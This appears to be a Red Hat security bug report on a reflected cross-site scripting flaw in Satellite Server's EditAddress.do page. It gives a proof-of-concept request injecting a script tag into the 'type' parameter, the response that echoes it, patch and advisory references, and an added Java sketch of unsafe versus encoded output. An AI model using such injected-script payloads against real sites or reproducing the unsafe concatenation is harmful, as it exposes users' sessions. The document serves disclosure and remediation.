Ryan Giobbi from UPMC reported an XSS flaw in the EditAddress.do page:

Request

GET /rhn/account/EditAddress.do?type=M83ab7<script>alert(1)</script>c47ea873a9d&uid=41 HTTP/1.1
Host: host.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 21 Feb 2013 18:24:04 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: pxt-session-cookie=7053xcace9e6d1158735e6f047ab49e4e509c; Path=/; Secure; HttpOnly
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="e
...[SNIP]...
<h2>
**address type M83ab7<script>alert(1)</script>c47ea873a9d** Record:
</h2>
...[SNIP]...
Acknowledgements: Red Hat would like to thank Ryan Giobbi of UPMC for reporting this issue.
Created attachment 820005
Patch fixes XSS issue

Fix the reported issue
commit 07a7bd38b492cf2d77e1223ae3acfac75244254e
This issue has been addressed in following products:

Red Hat Satellite Server v 5.6

Via RHSA-2014:0148 https://rhn.redhat.com/errata/RHSA-2014-0148.html
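
The reflection shown in the report above, sketched as an added example; this is not the attached patch or any code from the product. It renders the heading once with the raw type parameter and once with output encoding plus an allowlist. The class and method names are hypothetical, and the type codes other than M are assumptions.

```java
import java.util.Set;

public class EditAddressHeading {
    // Hypothetical allowlist: only "M" appears in the report; "B" and "S" are assumed.
    private static final Set<String> KNOWN_TYPES = Set.of("M", "B", "S");

    /** Before: the request parameter is concatenated into the markup as-is. */
    static String renderUnsafe(String type) {
        return "<h2>address type " + type + " Record:</h2>";
    }

    /** Encode the five characters that are significant in HTML text and attributes. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    /** After: reject unknown type codes, and encode on output regardless. */
    static String renderSafe(String type) {
        if (type == null || !KNOWN_TYPES.contains(type)) {
            throw new IllegalArgumentException("unknown address type");
        }
        return "<h2>address type " + escapeHtml(type) + " Record:</h2>";
    }

    public static void main(String[] args) {
        String reported = "M83ab7<script>alert(1)</script>c47ea873a9d"; // value from the report
        System.out.println(renderUnsafe(reported));                  // script tag reaches the page intact
        System.out.println("<h2>" + escapeHtml(reported) + "</h2>"); // same value as inert text
        try {
            renderSafe(reported);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());       // allowlist stops it before rendering
        }
        System.out.println(renderSafe("M"));                         // a known code renders normally
    }
}
```

The allowlist check alone would stop this request, but encoding at the point of output is what keeps the heading safe if a new type code or another reflected field is added later.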